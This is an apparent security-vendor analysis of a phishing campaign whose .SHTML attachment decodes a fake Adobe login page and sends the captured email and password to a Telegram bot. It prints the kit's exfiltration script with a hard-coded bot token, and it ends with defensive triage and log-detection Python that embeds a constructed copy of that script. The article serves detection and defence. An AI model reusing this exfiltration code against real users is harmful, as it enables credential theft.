<h1>HTML attachments in phishing emails steal information and send it to Telegram channels</h1>
<p>Published 27 May 2025 on <a href="https://fpt-is.com/en/insights/html-attachments-in-phishing-emails-steal-information-and-send-it-to-telegram-channels/">fpt-is.com</a>.</p>
<p>Attackers have long known that attaching an HTML file to a phishing email works well. Instead of luring the victim to a malicious link, the attachment carries a complete web page built to capture login credentials. The page renders locally in the victim's browser, so there is no hosted phishing site to take down or to check against URL reputation; the only network activity is the single request that delivers the captured data to an attacker-controlled command-and-control (C2) endpoint. That combination has made the technique increasingly popular with cybercriminals.</p>
<h2 id="heading-exploitation-method" class="permalink-heading">Exploitation Method</h2>
<p>New variants of the self-contained HTML phishing attachment have emerged continuously over the years. In a recent SANS Internet Storm Center diary <a href="https://isc.sans.edu/diary/rss/31388" target="_blank" rel="noopener nofollow">post</a>, a handler reviewing phishing emails the ISC had received identified a new variant with several distinctive characteristics.</p>
<p><img src="https://cdn.fpt-is.com/en/sites/3/HTML-attachments-in-phishing-emails-steal-information-and-send-it-to-Telegram-channels-FPT-IS-1-1739414965.jpg" alt="The phishing email with its .SHTML attachment" width="1600" height="625"></p>
<p>At first glance the email looks like the phishing messages users receive every day. The attachment is where it differs. The file carries a <code>.SHTML</code> extension, most likely chosen to slip past filters that match on <code>.html</code>, since a browser renders the file as ordinary HTML anyway. Its body consists of nothing but three <code>&lt;script&gt;</code> blocks.</p>
<pre><code class="lang-plaintext">&lt;script&gt;
    let zhe = [e-mail address of the recipient];
&lt;/script&gt;
</code></pre>
<p>The first script only stores the recipient's email address; it is later written into the fake login form so that the page appears to be personalised for the victim.</p>
<pre><code class="lang-plaintext">&lt;script language="javascript"&gt;
document.write(unescape('%3C%68
...
%0A%20'));
&lt;/script&gt;
</code></pre>
<p>The second script carries the entire malicious page as one URL-encoded (percent-encoded) string and writes it into the document with <code>document.write(unescape(...))</code>. The decoded markup renders a fake login page that prompts the victim for a password. The encoding hides the HTML from simple keyword and signature checks at the mail gateway, yet a browser undoes it trivially, so the page works with no further dependency.</p>
<p><img src="https://cdn.fpt-is.com/en/sites/3/HTML-attachments-in-phishing-emails-steal-information-and-send-it-to-Telegram-channels-FPT-IS-2-1739414988.jpg" alt="The fake Adobe login page rendered from the decoded HTML" width="1600" height="846"></p>
<pre><code class="lang-plaintext">&lt;script type="text/javascript"&gt;
    ...
    window.addEventListener('load', () =&gt; {
        emailGrab.textContent = zhe;
    });
    let xyz = 6232213176;                                        // chat_id of the attacker's Telegram chat
    let yxz = '6274096448:AAFIuDO3z8WR4lglrmpW3RvReWlVaHQVYJ0'; // bot token, hard-coded in the attachment
    function telegramApi(method, id, message) {
        // exfiltration: one HTTPS GET to the Bot API, with the captured data in the query string
        fetch(`https://api.telegram.org/bot${yxz}/${method}?chat_id=${id}&amp;text=${message}&amp;parse_mode=HTML`);
    }
    button.addEventListener('click', () =&gt; {
        const results = `Adobe EmailAddress: ${emailGrab.textContent} Adobe Password: ${passInput.value}`;
        if (passInput.value === '') {
            alert('The Following error(s) occured - Password Required')
        }
        else {
            telegramApi('sendMessage', xyz, results);
            ...
        }
    });
    ...
&lt;/script&gt;
</code></pre>
<p>What sets this variant apart is the third script, which is barely obfuscated at all. The stolen data is not posted to an attacker-hosted C2 server; it is delivered to a Telegram chat with a single GET request to the Bot API at <code>api.telegram.org</code>, using a bot token and <code>chat_id</code> hard-coded in the attachment (the positive <code>chat_id</code> here identifies a user's private chat; groups and channels have negative ids in the Bot API). The email address and password travel in the <code>text</code> query parameter of that URL. This gives the attacker instant, free exfiltration with no infrastructure to register or maintain, and it complicates detection because <code>api.telegram.org</code> is a legitimate, widely used domain reached over HTTPS: domain-reputation and URL-filtering controls rarely flag it, and the request looks like ordinary application traffic. Two details matter for defenders. Browser same-origin restrictions do not stop the theft, because a cross-origin GET issued by <code>fetch()</code> is still sent even when the script is not allowed to read the response. And because the bot token sits in plain text in the attachment, it is a high-fidelity indicator of compromise that can be hunted for across mail stores and proxy logs.</p>
<h2 id="heading-conclusion" class="permalink-heading">Conclusion</h2>
<p>Modern phishing campaigns keep refining their techniques to get past security controls. Shipping an encoded login page inside an HTML attachment and delivering the harvested credentials to a messaging platform such as Telegram shows how simple, low-cost and effective those refinements can be.</p>
<p>The approach evades traditional attachment and URL filters and hides its exfiltration inside traffic to a popular, legitimate service. Organisations should therefore treat unconventional communication channels as part of their monitoring scope. Concretely: block or sandbox HTML-family attachments (<code>.html</code>, <code>.htm</code>, <code>.shtml</code>, <code>.xhtml</code>) at the mail gateway rather than matching on a single extension; flag attachments whose only content is script, or that call <code>document.write(unescape(</code> on a large encoded string; and alert on, or block outright through DNS or URL filtering, requests to <code>api.telegram.org/bot&lt;token&gt;/sendMessage</code>. That host serves the Bot API, which ordinary Telegram client apps generally do not depend on, so blocking it where bots have no business use carries little collateral damage. Where TLS inspection is in place, the full URL, including the stolen credentials, is visible in proxy logs and can be matched with the same pattern.</p>
<p>Employees should also be trained to recognise the signs of phishing, including the fact that a legitimate login page does not arrive as a file attachment. As threats grow more sophisticated, a comprehensive strategy combining technical defences with user awareness remains essential to protecting organisational systems and data.</p>
<h2 id="heading-references" class="permalink-heading">References</h2>
<ol>
<li>SANS ISC diary: <a href="https://isc.sans.edu/diary/rss/31388" target="_blank" rel="noopener nofollow">https://isc.sans.edu/diary/rss/31388</a></li>
</ol>
<p><strong>Exclusive article by FPT IS Technology Experts</strong></p>
<p><em>Nam Anh Mai D. – FPT IS Cyber Security Center</em></p>
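<p>The following Python is an added example, hypothetical analyst tooling written for this article and not code from FPT IS, the SANS diary or the phishing kit itself. It automates the two steps walked through above: statically triaging an HTML/SHTML attachment by decoding the <code>document.write(unescape(...))</code> payload (emulating JavaScript's <code>unescape</code>, including the legacy <code>%uXXXX</code> form, which <code>urllib</code> does not handle), recovering the hidden login form and harvesting the Telegram bot token and <code>chat_id</code>; and then applying the same Bot API pattern to proxy log lines, as the conclusion recommends. The sample attachment, the bot token, the chat id and the log lines are all constructed placeholders.</p>

```python
from __future__ import annotations
import re
from urllib.parse import urlsplit, parse_qs

# Placeholder credential for the constructed sample (Bot API tokens have the shape
# "<bot id>:<35-char secret>"); it is not the token from the real kit.
FAKE_TOKEN = "1234567890:" + "A" * 35

# Constructed attachment mirroring the three-script layout described in the article.
SAMPLE_ATTACHMENT = r"""<script>
     let zhe = "victim@example.com";
</script>
<script language="javascript">
document.write(unescape('%3C%68tml%3E%3Cbody%3E%3Cform%3E%3Cinput%20id%3D%22passInput%22%20type%3D%22password%22%3E%3Cbutton%20id%3D%22button%22%3ESign%20in%3C%2Fbutton%3E%3C%2Fform%3E%3C%2Fbody%3E%3C%2Fhtml%3E'));
</script>
<script type="text/javascript">
    let xyz = 987654321;
    let yxz = '__TOKEN__';
    function telegramApi(method, id, message) {
        fetch(`https://api.telegram.org/bot${yxz}/${method}?chat_id=${id}&text=${message}&parse_mode=HTML`);
    }
    button.addEventListener('click', () => { telegramApi('sendMessage', xyz, passInput.value); });
</script>
""".replace("__TOKEN__", FAKE_TOKEN)

DOC_WRITE_RE = re.compile(r"""document\.write\(\s*unescape\(\s*(['"])(.*?)\1\s*\)\s*\)""", re.S)
BOT_TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{35})\b")
NUMERIC_ASSIGN_RE = re.compile(r"=\s*(-?\d{6,})\s*;")  # e.g. `let xyz = 987654321;`
BOT_API_RE = re.compile(r"https?://api\.telegram\.org/bot(\d{8,10}):([A-Za-z0-9_-]{35})/(\w+)")


def js_unescape(payload: str) -> str:
    """Emulate JavaScript unescape() in a single pass: %XX is a Latin-1 code point
    (urllib.parse.unquote would assume UTF-8) and the legacy %uXXXX form, which
    unquote does not understand at all, is a BMP code point."""
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), payload)


def decode_document_writes(html: str) -> list[str]:
    """Recover every page hidden behind document.write(unescape('...'))."""
    return [js_unescape(m.group(2)) for m in DOC_WRITE_RE.finditer(html)]


def extract_telegram_iocs(text: str) -> dict:
    """Harvest the exfiltration channel from kit source: bot tokens, candidate chat ids
    (numeric assignments or literal chat_id= values) and the Bot API methods called."""
    tokens = sorted(set(BOT_TOKEN_RE.findall(text)))
    bot_ids = {t.split(":")[0] for t in tokens}
    chat_ids = {c for c in NUMERIC_ASSIGN_RE.findall(text) if c not in bot_ids}
    chat_ids.update(re.findall(r"chat_id=(-?\d{6,})", text))
    methods = sorted(set(re.findall(r"\b(send[A-Z][A-Za-z]+)\b", text)))
    return {"tokens": tokens, "chat_ids": sorted(chat_ids), "methods": methods,
            "uses_bot_api": "api.telegram.org" in text}


def triage_attachment(html: str) -> dict:
    """Static verdict for one attachment: decode the hidden page, check it for a
    credential form, and pull the Telegram exfiltration details out of the scripts."""
    payloads = decode_document_writes(html)
    decoded = "\n".join(payloads)
    iocs = extract_telegram_iocs(html + "\n" + decoded)
    indicators = {
        "document_write_unescape": bool(payloads),
        "password_field_in_decoded_html": bool(re.search(r"type\s*=\s*['\"]?password", decoded, re.I)),
        "telegram_bot_token": bool(iocs["tokens"]),
        "bot_api_endpoint": iocs["uses_bot_api"],
    }
    score = sum(indicators.values())
    verdict = "malicious" if score >= 3 else "suspicious" if score else "clean"
    return {"verdict": verdict, "indicators": indicators, "iocs": iocs, "decoded_html": payloads}


# Constructed proxy log lines ("<time> <client> <method> <url> <status>"), not real traffic.
SAMPLE_PROXY_LOG = [
    "2025-05-27T10:01:02Z 10.0.0.15 GET https://www.example.com/ 200",
    f"2025-05-27T10:01:09Z 10.0.0.15 GET https://api.telegram.org/bot{FAKE_TOKEN}/sendMessage"
    "?chat_id=987654321&text=Adobe%20EmailAddress%3A%20victim%40example.com%20Adobe%20Password%3A%20hunter2&parse_mode=HTML 200",
    f"2025-05-27T10:02:30Z 10.0.0.22 GET https://api.telegram.org/bot{FAKE_TOKEN}/getMe 200",
]


def detect_bot_api_exfil(log_lines: list[str]) -> list[dict]:
    """Flag Bot API send* calls in proxy logs (full URLs are only visible where TLS is
    inspected); the token secret is redacted so the alert does not carry a usable credential."""
    hits = []
    for line in log_lines:
        ts, client, _method, url, *_ = line.split()
        m = BOT_API_RE.search(url)
        if not m or not m.group(3).startswith("send"):  # getMe, getUpdates etc. are not exfil
            continue
        qs = parse_qs(urlsplit(url).query)  # parse_qs already percent-decodes the values
        hits.append({"time": ts, "client": client, "method": m.group(3),
                     "token": f"{m.group(1)}:{m.group(2)[:4]}...",
                     "chat_id": qs.get("chat_id", [""])[0],
                     "leaked_text": qs.get("text", [""])[0]})
    return hits


if __name__ == "__main__":
    import json
    print(json.dumps(triage_attachment(SAMPLE_ATTACHMENT), indent=2))
    print(json.dumps(detect_bot_api_exfil(SAMPLE_PROXY_LOG), indent=2))
```

<p>Run stand-alone, the script prints a <code>malicious</code> verdict for the constructed attachment with the decoded form, the bot token and the chat id, and one proxy hit whose <code>leaked_text</code> field shows exactly what reached the attacker. The verdict is deliberately a simple indicator count rather than a signature on the kit's variable names (<code>zhe</code>, <code>xyz</code>, <code>yxz</code>), which change between variants; the structural pattern of script-only body, encoded <code>document.write</code> and a Bot API call does not.</p>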